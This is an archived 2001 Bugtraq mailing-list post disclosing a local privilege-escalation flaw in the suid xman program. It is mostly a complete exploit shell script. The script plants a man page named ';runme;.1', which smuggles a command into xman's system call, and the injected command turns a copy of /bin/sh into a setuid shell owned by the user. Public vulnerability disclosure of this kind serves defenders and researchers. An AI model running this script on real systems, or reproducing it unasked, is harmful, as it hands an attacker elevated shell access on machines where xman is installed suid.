6761527 2001-07-17 20:28 +0000  /39 rader/  <v9@realhalo.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-18  00:09  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <18055>
Ärende: xman (suid) exploit, made easier.
------------------------------------------------------------
From: <v9@realhalo.org>
To: bugtraq@securityfocus.com
Message-ID: <20010717202808.26309.qmail@securityfocus.com>

xman doesn't drop privileges anywheres in the 
program.  but, does support suid installation.  so, 
exploiting via a system call is much easier than the
buffer overflow in MANPATH, mentioned in another 
bugtraq posting.  here is an example of such an
exploitation possibility:

-- xxman.sh --

#!/bin/sh
# example of xman exploitation. xman
# supports privileges.  but, never
# drops them.
# Vade79 -> v9@realhalo.org -> realhalo.org. 
MANPATH=~/xmantest/
mkdir -p ~/xmantest/man1
cd ~/xmantest/man1
touch ';runme;.1'
cat << EOF >~/xmantest/runme
#!/bin/sh
cp /bin/sh ~/xmansh
chown `id -u` ~/xmansh
chmod 4755 ~/xmansh
EOF
chmod 755 ~/xmantest/runme
echo "click the ';runme;' selection," \
"exit.  then, check for ~/xmansh."
xman -bothshown -notopbox
rm -rf ~/xmantest

-- xxman.sh --

Vade79 -> v9@realhalo.org -> realhalo.org.
(6761527) / <v9@realhalo.org>/----------------------